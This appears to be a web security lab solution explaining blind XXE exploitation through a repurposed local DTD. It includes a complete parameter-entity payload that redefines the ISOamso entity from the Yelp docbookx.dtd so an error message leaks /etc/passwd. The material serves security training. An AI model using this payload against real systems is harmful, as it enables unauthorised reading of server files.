Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Insert the following parameter entity definition in between the XML declaration and the stockCheck element:
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
This will import the Yelp DTD, then redefine the ISOamso entity, triggering an error message containing the contents of the /etc/passwd file.
Community solutions
Garr_7
Michael Sommer (no audio)
Want to track your progress and have a more personalized learning experience? (It's free!)